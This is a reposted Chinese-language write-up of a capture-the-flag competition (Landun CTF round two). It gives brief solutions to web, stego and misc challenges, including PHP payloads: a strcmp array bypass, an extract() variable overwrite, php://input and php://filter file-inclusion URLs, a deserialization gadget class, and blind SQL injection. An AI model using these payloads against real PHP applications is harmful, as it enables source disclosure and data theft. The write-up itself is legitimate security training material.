藍盾CTF 第二場 WP


 

 

 

 

 

  1. 簽到題

修改一個大小值

2.簡單的Web題

根據提示是一個POST的一個傳值。只要繞過strcmp函數即可

傳遞是是一個數組,構造一下成為password[]=a

 

3.送大禮

 

含有一個flag.txt文件。進去之后看的很可怕。

把那些東西放在谷歌的consle中的出來的是一個php

 

 

extract($_GET);  if(isset($bdctf))  {      $content=trim(file_get_contents($flag));     if($bdctf==$content)     {          echo'bdctf{**********}';      }    else    {      echo'這不是藍盾的密碼啊';    }     }

 

構造一下url 只要?flag=&bdctf= 即可

4.藍盾管理員

進入之后查源代碼

看到源碼后,

這個題目首先要突破的是:
if(isset($user)&&(file_get_contents($user,'r')==="the user is dbadmin"))

構造了如下

http://2a8da10821f39ea335a12fba77f7c3fc.yogeit.com:8080/?user=php://input&file=php://filter/read=convert.base64-encode/resource=flag.php

 

 

得到了入下

 

嘗試破解

 

 

 

5.bluedon用戶

查看class.php,發現得不到什么,但是這里有include($file),猜測有文件包含漏洞

php://filter/read=convert.base64-encode/resource=class.php

 

 

解碼出來的是一個php

 

<?php class Read{//f1a9.php

    public $file; public function __toString(){ if(isset($this->file)){ echo file_get_contents($this->file); } return "恭喜get flag"; } } ?>

 

 

 

 

 

 

查看首頁試試

<?php

@$user = $_GET["user"];

@$file = $_GET["file"];

@$pass = $_GET["pass"];

 

if(isset($user)&&(file_get_contents($user,'r')==="the user is bluedon")){

    echo "hello bluedon!<br>";

    if(preg_match("/f1a9/",$file)){

        exit();

    }else{

        @include($file); //class.php

        $pass = unserialize($pass);

        echo $pass;

    }

}else{

    echo "you are not bluedon ! ";

}
?>

  

 

 

 看到這是一個類  里面__toString()類似構造函數  發現flag在f1a9.php里面中 直接訪問無果

於是php://filter/read=convert.base64-encode/resource=index.php查看其代碼 

於是構造了一個代碼如下:

 

 

 

 

 

6.火星撞地球

直接注入,盲注,上神器WebCruiser直接出了

 

 

 

 

尷尬,還以為admin的密碼不是flag,還去付費解了另一個賬號的加鹽MD5。

 

 

 

 

解密加鹽發現密碼都是1q2w3e4r

 

7. 抓小雞:
對chm文件解壓,提取內部的readme.html 閱讀文件得到cc服務器地址

 

 

 

 

8.Stega圖片題目

修改圖片高度為500,即可看到圖片下方的flag

 

 

 

 

 

9.WEB100-2

時間緊迫,直接說思路吧

根據hint中的提示,對字符串進行序列化並url encode,加入cookie中,即可得到flag

 

10.雜項全家桶思路:

時間有點趕,直接說思路吧。

 

一線:png缺少文件頭,補齊獲得二維碼,二維碼掃描得出一段漢字,當鋪密碼解密得到mp3解密需要的密碼。

 

二線:png改后綴名得到mp3文件。Mp3解密,得到柵欄凱撒密文,隱約記得是第三欄,得出flag。

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM